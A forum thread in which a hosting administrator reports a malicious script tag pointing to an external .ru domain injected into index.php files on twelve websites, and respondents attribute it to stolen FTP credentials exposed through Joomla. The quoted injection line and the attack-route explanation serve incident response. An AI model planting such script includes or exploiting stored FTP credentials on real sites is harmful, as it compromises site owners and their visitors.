Hello,
I manage the hosting for a few dozen websites. Since about a week I've been finding this code in 12 different websites in theindex.php files:
<script type="text/javascript" src="http://superiot.ru/**.js"></script> // The name of the actual javascript file differs
<!-- some hash here-->
Some of the websites are on different servers, some aren't. I'm just wondering if anyone else has been seeing this too.
Edit with some more information:
- All servers are centOS 5.3
- PHP versions are either 5.2.9 or 5.2.4
- Apache versions are either 2.2.3 or 1.3.39
-
Are you using the same software on each of the websites in question?
Looks like either a tainted CMS plugin or your sites have attracted some undesirable attention.
klennepette : 2 of the websites use the Joomla CMS, the others are custom built. They don't seem to share a third party tool besides google analytics.danlefree : While there is still a strong likelihood that the attack was automated, you should probably respond to this incident as though a malicious user has access to your systems (because he probably does, if he bothers using it).From danlefree -
That javascript is added through an FTP exploit. If I recall, it finds the FTP account data through a hole in Joomla that exposes the FTP Layer user/password which Joomla so elegantly stores in the clear.
You'll find any index., default., home.* may be affected. Also, pay particular attention to jquery.js that is locally maintained, it can modify that to add code to the bottom.
From karmawhore
0 comments:
Post a Comment